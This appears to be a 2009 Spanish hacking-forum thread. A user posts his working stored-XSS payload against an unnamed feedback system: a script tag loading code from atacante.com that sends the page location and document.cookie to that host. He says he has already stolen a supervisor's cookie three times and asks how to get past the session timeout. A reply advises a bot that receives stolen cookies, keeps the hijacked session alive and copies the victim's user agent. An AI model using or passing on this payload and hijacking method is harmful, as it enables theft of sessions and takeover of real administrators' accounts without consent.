[xss] ayuda

Iniciado por Og., 8 Agosto 2009, 04:46 AM

0 Miembros y 1 Visitante están viendo este tema.

Og.

hola  :D!.
Pues necesito su ayuda, asi esta la cosa:
Existe un sistema en donde tu pones tu duda, sugerencia, comentario etc.. y una persona te responde a tu comentario (en un par de dias :P) bueno, la cuestion es que ese sistema es vulnerable a xss (lo se por que ya he hecho pruebas), el sistema al que estoy atacando es completamente desconocido (yo envio el comentario y puedo verlo desde el punto de vista de un usuario comun, pero no tengo idea de lo que ve el encargado) nisiquiera se puede saber en que pagina va a ser visualizado el mensage, entonces lo que hice fue esto:
linea de escape en el msg
Código (html) [Seleccionar]
<script src=http://atacante.com/script.js ></script>

script.js
Código ( ‫javascript) [Seleccionar]
window.onload=function(){
var a = document.getElementsByTagName("body");
var ar = a[0];
ar.innerHTML += "<img height=1 width=1 src=http://atacante.com/script.php?ref="+escape(document.location)+"&cook="+escape(document.cookie)+" >";
}

asi consigo la cookie y tambien se donde usarla =D

El problema es que el sistema se desloguea automaticamente despues de 10 mins de no hacer nada,
todo el sistema esta administrado por sessiones (entonces capturar la cookie no me ayuda a descifrar nada).

Ya he conseguido la cookie del supervisor 3 veces, tambien se donde esta la pagina de administracion pero el problema es que cuando intento usar la session obtenida ya esta caducada, no tienen alguna idea de como puedo avanzar?

saludos!
|-

Hadess_inf

Es dificil saber puesto que quizas sea una medida de seguridad, aignar ese tiempo de vida para esa session.

:-X :-X :-X

Og.

#2
Cita de: Hadess_inf en  8 Agosto 2009, 04:51 AM
Es dificil saber puesto que quizas sea una medida de seguridad, aignar ese tiempo de vida para esa session.

:-X :-X :-X
y si uso la cookie al instante?
creo que se puede con sockets, asi aunque sea puedo guardar las paginas que puede ver y saber si hay algun upload o algo que me sirva, pero no tengo idea de como usarlos, alguien tendra un tutorial?
|-

WHK

haz un bot que evite la caducación de esa sesión... por ejemplo que mande la cookie a tu bot que puede tener un socket a escucha y cuando le llegue una conexión que obtenga los datos y desconecte al visitante.. loego el bot que haga repetidas peticiones get a la web con esa cookie manteniendo la sesión activa y le aprobechas de sacar capturas desde el mismo bot... luego cuando llegues el bot segurá activo, tomas su cookie y la usas.
Intenta capturar el user agent de la persona proque muchas veces ese tipo de sesiones que caducan luego también verifican el user agent para evitar entrecomillas un robo de sesión.

Talves el sistema no desloguea a los 5 o 10 minutos sino que el mismo administrador se desloguea al momento de terminar lo que hace.

Lo otro sería que lo dejes un dia viernes y te quedes esperandolo hasta el domingo y aprobechas de entrar justo en ese momento.. te haces un bot que te alerte al instante.